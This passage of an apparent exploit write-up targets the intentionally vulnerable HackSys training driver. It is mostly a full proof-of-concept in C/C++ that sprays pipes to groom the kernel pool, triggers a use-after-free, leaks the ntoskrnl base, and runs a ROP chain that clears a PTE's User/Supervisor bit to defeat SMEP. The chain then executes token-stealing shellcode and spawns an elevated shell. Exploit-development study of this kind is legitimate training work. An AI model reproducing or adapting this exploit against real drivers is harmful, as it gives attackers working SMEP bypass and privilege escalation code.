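constexpr std::uint64_t pte_offset(std::uint64_t va) {
    return (va >> 9) & 0x7FFFFFFFF8ULL;
}

// "add rax, rcx" in the chain: PTE base plus the offset computed in user mode.
constexpr std::uint64_t pte_address(std::uint64_t va, std::uint64_t pte_base) {
    return pte_base + pte_offset(va);
}

constexpr std::uint64_t kUserSupervisorBit = 1ULL << 2; // U/S bit of an x64 PTE

// "add qword ptr [rax], r8" with r8 = 0xfffffffffffffffc (-4).
constexpr std::uint64_t add_minus_four(std::uint64_t pte) {
    return pte + 0xfffffffffffffffcULL;
}

// Hypothetical example values, for illustration only.
constexpr std::uint64_t kExamplePteBase = 0xFFFFF68000000000ULL;
constexpr std::uint64_t kExamplePte     = 0x867; // low flag bits of a user-mode page

static_assert(pte_offset(0x83000000ULL) == 0x418000, "offset for the pivot address");
static_assert(pte_address(0x83000000ULL, kExamplePteBase) == 0xFFFFF68000418000ULL, "");
static_assert(add_minus_four(kExamplePte) == 0x863, "only bit 2 changes");
static_assert((add_minus_four(kExamplePte) & kUserSupervisorBit) == 0, "page is now supervisor");
```

Adding -4 clears the U/S bit only because the bit is set to begin with, which is the case for a user-mode page. Once the page is marked as supervisor, SMEP no longer blocks the kernel from executing it.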

The defragmentation and allocation process sometimes takes 1 or 2 attempts, but a failed attempt won’t crash the machine. An IRQL_NOT_LESS_OR_EQUAL crash can occur after the stack pivot executes, but as I explained earlier, it doesn’t always happen, only when the IRQL is higher; otherwise we can still execute our shellcode in user space.

Final POC:

#include <Windows.h>
#include <stdio.h>
#include <psapi.h>

#define ALLOCATE_UAF_NON_PAGED CTL_CODE(FILE_DEVICE_UNKNOWN, 0x804, METHOD_NEITHER, FILE_ANY_ACCESS)
#define FREE_UAF_NON_PAGED CTL_CODE(FILE_DEVICE_UNKNOWN, 0x806, METHOD_NEITHER, FILE_ANY_ACCESS)
#define USE_UAF_NON_PAGED CTL_CODE(FILE_DEVICE_UNKNOWN, 0x805, METHOD_NEITHER, FILE_ANY_ACCESS)
#define ALLOCATE_FAKE_NON_PAGED CTL_CODE(FILE_DEVICE_UNKNOWN, 0x807, METHOD_NEITHER, FILE_ANY_ACCESS)

#define HANDLE_COUNT 20000
#define ALLOC_HANDLE_COUNT 80000
#define FAKE_ALLOC_COUNT (ALLOC_HANDLE_COUNT / 2) // parenthesized so the macro expands safely inside expressions

int fengshui() {
    HANDLE* rPipes = (HANDLE*)malloc(HANDLE_COUNT * sizeof(HANDLE));
    HANDLE* wPipes = (HANDLE*)malloc(HANDLE_COUNT * sizeof(HANDLE));
    HANDLE* srPipes = (HANDLE*)malloc(ALLOC_HANDLE_COUNT * sizeof(HANDLE));
    HANDLE* swPipes = (HANDLE*)malloc(ALLOC_HANDLE_COUNT * sizeof(HANDLE));
    if (rPipes == NULL || wPipes == NULL || srPipes == NULL || swPipes == NULL) {
        printf("Error: Memory allocation failed\n");
        return 1;
    }

    CHAR buffer[0x30];
    DWORD outLength;

    memset(buffer, 'A', sizeof(buffer));

    printf("[+] Phase I: Performing Defragmentation for the object....\n");

    for (int i = 0; i < HANDLE_COUNT; i++) {
        if (!CreatePipe(&rPipes[i], &wPipes[i], NULL, sizeof(buffer))) {
            printf("Error: CreatePipe failed at iteration %d\n", i);
            break;
        }

        if (!WriteFile(wPipes[i], buffer, sizeof(buffer), &outLength, NULL)) {
            printf("Error: WriteFile failed at iteration %d\n", i);
            break;
        }
    }

    printf("[+] Phase II: Allocating objects in sequence....\n");

    for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) {
        if (!CreatePipe(&srPipes[i], &swPipes[i], NULL, sizeof(buffer))) {
            printf("Error: CreatePipe failed at iteration %d\n", i);
            break;
        }

        if (!WriteFile(swPipes[i], buffer, sizeof(buffer), &outLength, NULL)) {
            printf("Error: WriteFile failed at iteration %d\n", i);
            break;
        }
    }

    printf("[+] Phase III: Creating holes in the pool...\n");
    for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) {
        if (i % 2 == 0) {
            CloseHandle(srPipes[i]);
            CloseHandle(swPipes[i]);
        }
    }
    //free(rPipes);
    //free(wPipes);
    //free(srPipes);
    //free(swPipes);
    return 0;
}

PVOID getbaseaddress()
{
    BOOL status;
    LPVOID* pImageBase;
    DWORD ImageSize;

    status = EnumDeviceDrivers(nullptr, 0, &ImageSize);

    pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

    status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);

    LPVOID ntaddr = pImageBase[0];

    return ntaddr;
}

uintptr_t MiGetPte(LPVOID lpMemory) {
    uintptr_t addr = reinterpret_cast<uintptr_t>(lpMemory);

    uintptr_t calc1 = addr >> 9; // shr rcx, 9 
    uintptr_t calc2 = calc1 & 0x7FFFFFFFF8; // and rax, rcx

    return calc2;
}

int main()
{
    BOOL success; // DeviceIoControl returns BOOL, not NTSTATUS

    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFileW(
        L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
        FILE_SHARE_WRITE,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);

    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Failed to open handle: %lu\n", GetLastError());
        return 1;
    }

    printf("[+] Performing Pool grooming...\n");
    fengshui();

    printf("[+] Calling AllocateUaFObjectNonPagedPool....");

    success = DeviceIoControl(
        hDriver,
        ALLOCATE_UAF_NON_PAGED,
        nullptr,
        0,
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed: %lu\n", GetLastError());
    }

    printf("[+] Calling FreeUaFObjectNonPagedPool....");

    success = DeviceIoControl(
        hDriver,
        FREE_UAF_NON_PAGED,
        nullptr,
        0,
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed: %lu\n", GetLastError());
    }

    LPVOID nt_addr = getbaseaddress();
    printf("[+] Nt base address: %p\n", nt_addr);

    BYTE shellcode[256] = {
    0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
    0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
    0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
    0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
    0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
    0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
    0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
    0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
    0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
    0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
    0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
    0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
    0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
    0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff
    };

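    LPVOID lpMemory = VirtualAlloc(NULL, sizeof(shellcode), (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE);
    if (lpMemory == NULL) {
        printf("[!] Failed to allocate memory for the shellcode: %lu\n", GetLastError());
        CloseHandle(hDriver);
        return 1;
    }
    printf("[+] Shellcode address: %p\n", lpMemory);
    memcpy(lpMemory, shellcode, sizeof(shellcode));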

    uintptr_t ShellcodePte = MiGetPte(lpMemory);
    printf("[+] PTE calculated shellcode address: %p\n", (void*)ShellcodePte);

    printf("[+] Calling AllocateFakeObjectNonPagedPool....\n");
    printf("[+] Filling the holes with fake objects..\n");

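    // Fake object that will be sprayed into the freed chunk. Its first 8 bytes are the
    // pointer the driver calls when the stale object is used, here the stack-pivot gadget.
    // The gadget offset is specific to the ntoskrnl build being targeted.
    CHAR buffer[0x58];
    *(LPVOID*)(buffer) = (LPVOID)((uintptr_t)nt_addr + 0x0059f24e); // mov esp, 0x83000000 ; ret
    memset(buffer + 0x8, 'B', 0x50);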

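    uintptr_t STACK_PIVOT = 0x83000000;
    LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (fakeStack == NULL) {
        printf("[!] Failed to allocate the fake stack: %lu\n", GetLastError());
        CloseHandle(hDriver);
        return 1;
    }
    printf("[+] Allocated region: %p\n", fakeStack);
    if (!VirtualLock(fakeStack, 0x10000)) {
        printf("Error using VirtualLock: %lu\n", GetLastError());
    }

    // memset takes (destination, fill byte, length): fill the fake stack with 0x41
    memset(fakeStack, 0x41, 0x10000);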
    int index = 0;
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00202e71); // pop rcx; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)ShellcodePte; // MiGetPte(lpMemory): PTE offset of the shellcode page, added to the PTE base below
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00201862); // pop rax; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13); // nt!MiGetPteAddress+0x13 (location of the PTE base value)
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0027bcbf); // mov rax, qword ptr [rax]; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0020e204); // add rax, rcx; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00201861); // pop r8 ; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)(0xfffffffffffffffc); // -4
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x003fd49b); // add qword ptr [rax], r8 ; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = lpMemory; // Shellcode in user-mode

    for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) {
        success = DeviceIoControl(
            hDriver,
            ALLOCATE_FAKE_NON_PAGED,
            buffer,
            sizeof(buffer),
            nullptr,
            0,
            nullptr,
            nullptr);
    }

    printf("[+] Calling UseUaFObjectNonPagedPool....");

    success = DeviceIoControl(
        hDriver,
        USE_UAF_NON_PAGED,
        nullptr,
        0,
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed: %lu\n", GetLastError());
    }

    printf("[+] Spawning a shell with elevated privileges\n\n");
    system("cmd");

    // close handle
    printf("[+] Closing handle\n");
    CloseHandle(hDriver);
}
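
The ROP chain above exists to flip one bit: it computes the address of the shellcode page's PTE and adds -4 to it, which clears the User/Supervisor bit so that SMEP no longer blocks execution of that page from kernel mode. The arithmetic can be sketched in portable C++ as shown below. This is only an illustration under assumptions: the helper names (pte_offset, pte_address, add_minus_four) are hypothetical, the shift-and-mask is the commonly documented x64 form of nt!MiGetPteAddress rather than the MiGetPte helper used in this post, and the PTE base value in the usage note is a placeholder, since the real base is randomized on recent builds and is read at runtime by the chain.

```cpp
#include <cstdint>

// Assumption: this mirrors the shift-and-mask at the start of nt!MiGetPteAddress
// on x64. It returns the PTE's offset from the PTE base for a virtual address.
constexpr std::uint64_t pte_offset(std::uint64_t va) {
    return (va >> 9) & 0x7FFFFFFFF8ULL;
}

// Full PTE address once the PTE base is known. In the chain this is the
// "mov rax, [rax]" followed by "add rax, rcx" pair.
constexpr std::uint64_t pte_address(std::uint64_t pte_base, std::uint64_t va) {
    return pte_base + pte_offset(va);
}

// Bit 2 of a PTE is the User/Supervisor (U/S) bit.
constexpr std::uint64_t kPteUserBit = 1ULL << 2;

// Models "add qword ptr [rax], r8" with r8 = 0xfffffffffffffffc (-4).
// Unsigned addition wraps modulo 2^64, so this equals pte - 4.
constexpr std::uint64_t add_minus_four(std::uint64_t pte) {
    return pte + 0xFFFFFFFFFFFFFFFCULL;
}

// Compile-time sanity checks on made-up values.
static_assert(pte_offset(0x1000ULL) == 0x8ULL, "second page maps to the second PTE");
static_assert((add_minus_four(0x867ULL) & kPteUserBit) == 0, "U/S bit is cleared");
```

For example, pte_address(0xFFFFF68000000000, 0x1000) gives 0xFFFFF68000000008 with the placeholder base, and add_minus_four(0x12345867) gives 0x12345863, a PTE value with the U/S bit cleared. Subtracting 4 only works when the bit is currently set: add_minus_four(0x63) yields 0x5F, which borrows from the higher bits and corrupts the entry, so a chain like this should run only once per page.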
